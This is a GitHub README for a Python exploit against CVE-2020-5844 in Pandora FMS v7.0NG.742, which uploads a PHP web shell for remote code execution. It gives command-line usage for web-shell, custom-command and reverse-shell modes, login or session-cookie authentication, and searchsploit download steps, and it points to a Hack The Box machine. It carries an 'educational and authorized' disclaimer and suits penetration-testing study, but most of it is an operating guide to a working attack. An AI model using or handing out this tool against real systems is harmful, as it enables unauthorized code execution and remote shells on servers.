Like this repo? Give us a ⭐!
For educational and authorized security research purposes only.
@UNICORDev by (@NicPWNs and @Dev-Yeoj)
index.php?sec=godmode/extensions&sec2=extensions/files_repo
in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020
.
Use this exploit for remote code execution on vulnerable versions of Pandora FMS. Requires a target IP address and port. Requires valid username/password or valid PHPSESSID cookie authentication. Run in default mode to upload a basic PHP web shell. Run in custom command mode to run a custom command on the target. Run in reverse shell mode to receive a reverse shell from the target on a listener you set up. Run in web shell custom mode to change the name of the PHP web shell file.
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
Download exploit-CVE-2020-5844.py from GitHub
Download exploit-CVE-2020-5844.py from ExploitDB
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742
- python3
- python3:requests
- https://nvd.nist.gov/vuln/detail/CVE-2020-5844
- https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz
- https://app.hackthebox.com/machines/Pandora
- https://github.com/TheCyberGeek/CVE-2020-5844
- https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated
- https://www.exploit-db.com/exploits/50961